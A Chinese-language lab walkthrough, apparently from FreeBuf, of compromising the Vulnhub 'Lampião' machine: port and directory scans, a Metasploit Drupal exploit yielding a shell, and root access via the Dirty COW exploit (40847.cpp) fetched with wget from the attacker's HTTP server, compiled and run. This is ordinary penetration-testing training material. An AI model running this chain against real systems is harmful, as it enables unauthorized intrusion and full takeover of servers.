Lampião打靶记录
木樨
- 关注
Lampião打靶记录
一、前期准备
1.下载地址
https://www.vulnhub.com/entry/lampiao-1,249/#download
2、导入
3、网络设置
桥接至物理网卡后启动。
二、信息收集
1、发现靶场ip
、
2、全端口扫描
nmap -Pn -p 0-65535 -O 192.168.0.101
3、目录扫描
python3 dirsearch.py -u http://192.168.0.101:1898/-x 403 python3 dirsearch.py -u http://192.168.0.101
4、发现敏感信息
访问特殊文件,发现爆出drupal框架版本
http://192.168.0.101:1898/CHANGELOG.txt
信息收集:drupal
Drupal是使用PHP语言编写的开源内容管理框架(CMF)
漏洞查询:查询后发现存在大量的版本漏洞
三、漏洞利用
1、启动msfconsole
搜索Drupal漏洞exp
search drupal
2、根据信息收集
根据版本进行漏洞测试
show option #查看参数 set rhost 192.168.0.101 # 服务远程ip set rport 1898 # 服务端口 exploit #启动
利用成功。获取shell
四、提权
1、信息收集
uname -a
第一个版本Ubuntu 4.10即发行于2004年10月20日
尝试使用脏牛提权。
上传提权漏洞检测脚本。
2、漏洞检测脚本执行
chmod +777 1.sh
/1.sh
3、发现脏牛漏洞,
脏牛漏洞利用简单,利用成功率高
寻找提权脚本
searchsploit dirty #查看脚本
locate linux/local/40847.cpp #寻找脚本所在位置 scp /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp #复制文件到 /tmp
python3 -m http.server 800 #启用http服务
wget http://192.168.0.110:800/40847.cpp #下载文件 g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil # 编译文件 chmod +777 40847 ./40847z
4、执行成功。
显示密码
5、连接:
ssh root@192.168.0.104
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 木樨 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
CMS Made Simple v2.2.15-RCE
2023-02-06
ED01-CMS v20180505
2023-02-06
春秋云境界---CVE-2022-28512
2023-02-05
文章目录